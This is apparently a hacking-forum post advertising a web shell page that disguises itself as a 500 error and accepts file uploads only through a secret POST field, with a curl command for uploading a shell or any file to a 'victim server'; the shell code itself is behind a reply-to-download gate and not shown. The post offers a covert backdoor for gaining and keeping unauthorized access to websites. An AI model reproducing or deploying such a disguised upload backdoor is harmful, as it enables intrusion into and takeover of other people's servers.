0xploit.com

Exploitation Tools Web Security Tools 500 Error Shell Upload Page

Use This Prefix If You're Sharing Tools Used for Exploiting Security Vulnerabilities to Gain Unauthorized Access.
This Prefix Contains Tools That Are Used for Securing Web Applications, Websites, or Web Services Against Cyber Threats and Attacks.
Joined
Mar 8, 2023
Messages
35
Location
Italy
Hellcoins
♆448
Username Style (Gradient Colours)
This is a SHELL page that you can attach to any script. If someone visits the file URL, it will just show a 500 error.

You can only upload the file via a POST request. It will also check that the input should be "hellofhackers," and the value should be "root." If it's not, it will not upload the file to the server. So, here is the correct command to upload your shell or any file to the server.

Code:
curl -F "hellofhackers=root" -F "HellHost=@/path/to/file" https://example.com/scriptname.php

so this is a curl command you just have to put your shell/file path and after that give the url where the script is uploaded on victim server then it will upload the file on location.

Reply to download the attchment
You must reply before you can see the hidden data contained here.
 
Top